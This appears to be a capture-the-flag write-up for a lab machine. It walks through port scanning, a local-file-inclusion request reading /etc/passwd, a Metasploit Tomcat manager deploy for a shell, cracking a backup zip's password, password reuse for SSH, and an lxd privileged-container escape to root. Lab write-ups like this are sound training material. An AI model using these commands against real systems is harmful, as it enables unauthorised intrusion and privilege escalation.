Enumeration:
Started by enumerating ports with nmap
:
root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.194 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 09:16 CEST
Nmap scan report for 10.10.10.194
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
Manually enumarated the web on port 80 found an url that is vulnerable to local file inclusion:
root@docker-desktop:~# curl http://10.10.10.194/news.php?file=../../../../../etc/passwd | head -n 1
root: x:0:0:root:/root:/bin/bash
Tried some techniques to get RCE from LFI without success.
Afterwards enumerated the port 8080 and found some interesting stuff:
Intrussion:
With all that data then searched for /etc/tomcat9/tomcat-users.xml
:
Used metasploit tomcat_mgr_deploy
to get the shell:
Privesc:
Then found in /var/www/html
a backup:
ash@tabby:/var/www/html/files$ ls
16162020_backup.zip archive revoked_certs statement
Downloaded the file and apparently is protected with a password so cracked it:
root@docker-desktop:~/Downloads# fcrackzip -u -D -p /root/shared/wordlists/rockyou.txt 16162020_backup.zip
PASSWORD FOUND!!!!: pw == admin@it
Then logged in as ash using ssh and that password:
ash@tabby:/var/lib/tomcat9$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
As we saw with id
we can do privesc with lxc:
ash@tabby:/var/lib/tomcat9$ lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| som | aa3de00946cd | no | alpine v3.12 (20200622_22:22) | x86_64 | CONTAINER | 2.97MB | Jun 22, 2020 at 6:48pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:/var/www/html/files$ lxc init som ignite -c security.privileged=true
ash@tabby:/var/www/html/files$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
ash@tabby:/var/www/html/files$ lxc start ignite
ash@tabby:/var/www/html/files$ lxc exec ignite /bin/sh
cd /mnt/root/root
ls
flag.txt